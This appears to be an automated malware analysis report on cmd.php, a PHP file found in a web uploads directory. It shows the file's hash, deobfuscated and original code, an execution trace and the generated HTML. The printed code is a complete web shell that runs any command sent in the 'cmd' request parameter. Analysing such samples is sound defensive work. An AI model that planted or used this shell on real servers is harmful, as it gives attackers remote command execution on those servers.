PHP Malware Analysis
cmd.php
md5: b3fef42a90ada8ec6601d96318efe53e
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo "<h1>123</h1>";
if (isset($_REQUEST['cmd'])) {
echo "<pre>";
$cmd = $_REQUEST['cmd'];
system($cmd);
echo "<pre>";
}
__halt_compiler(); ?>Execution traces
data/traces/b3fef42a90ada8ec6601d96318efe53e_trace-1676250037.4722.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:01:03.369989]
1 0 1 0.000134 393512
1 3 0 0.000186 394776 {main} 1 /var/www/html/uploads/cmd.php 0 0
1 3 1 0.000204 394776
0.000229 314336
TRACE END [2023-02-12 23:01:03.370109]
Generated HTML code
<html><head></head><body><h1>123</h1></body></html>Original PHP code
<?php echo '<h1>123</h1>'; if(isset($_REQUEST['cmd'])){echo '<pre>'; $cmd=$_REQUEST['cmd']; system($cmd); echo '<pre>'; } __halt_compiler(); ?>